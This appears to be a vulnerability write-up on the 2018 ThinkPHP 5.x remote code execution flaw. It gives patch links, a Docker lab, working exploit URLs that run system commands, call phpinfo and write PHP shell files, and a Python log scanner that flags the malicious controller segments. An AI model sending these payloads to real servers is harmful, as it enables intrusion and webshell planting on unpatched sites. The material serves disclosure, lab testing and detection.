On December 9, 2018, the ThinkPHP team released an important security update that fixes a serious remote code execution vulnerability. Because the framework does not adequately check the controller name, an attacker may be able to get a shell (getshell) when forced routing is not enabled. Affected versions include 5.0 and 5.1; updating to the latest version as soon as possible is recommended.
The problem comes mainly from how "\" is handled.
Patch:
ThinkPHP v5.0.x patch: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
ThinkPHP v5.1.x patch: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
Environment:
Docker environment for the vulnerability, source: https://github.com/vulnspy/thinkphp-5.1.29
Exploit
1. Remote Command Execution exp:
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2. Remote Code Execution
http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 # code execution phpinfo()
http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert # 5.1.x version, executes phpinfo()
http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 # 5.1.x version
http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() # 5.0.x version
3. Write shell
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>2.php
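Detection example (added here, not from the original post or the ThinkPHP project): every request above puts a "\" in the controller segment of the s= route, so this Python script flags access-log lines whose controller segment fails an allow-list. The allow-list pattern, the function names and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allow-list for a controller name: a letter, then word characters or dots.
# Compare it with the linked patch commits before relying on it.
SAFE_CONTROLLER = re.compile(r"[A-Za-z](\w|\.)*")
# Request field of a common/combined access-log line: "METHOD URI PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP addresses, payloads as shown above).
SAMPLE_LOG = [
    r'203.0.113.7 - - [10/Dec/2018:08:01:12 +0000] "GET /public/index.php?s=index/index/hello HTTP/1.1" 200 512',
    r'203.0.113.9 - - [10/Dec/2018:08:02:40 +0000] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 31',
    r'203.0.113.9 - - [10/Dec/2018:08:02:55 +0000] "GET /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 90211',
]

def suspicious_controller(uri):
    """Return the controller segment of the s= route if it fails the allow-list, else None."""
    # parse_qs percent-decodes values, so %5C and a literal backslash look the same here.
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for route in query.get("s", []):
        parts = route.strip("/").split("/")  # module / controller / action
        if len(parts) >= 2 and not SAFE_CONTROLLER.fullmatch(parts[1]):
            return parts[1]
    return None

def scan(lines):
    """Return (line_number, controller) for every log line with a rejected controller."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        controller = suspicious_controller(match.group(1))
        if controller is not None:
            hits.append((number, controller))
    return hits

if __name__ == "__main__":
    for number, controller in scan(SAMPLE_LOG):
        print(f"line {number}: controller segment {controller!r} is not a plain controller name")
```

Only routes passed in the s= query parameter are checked; routes carried in the URL path (PATH_INFO) need the same test applied to the path segments.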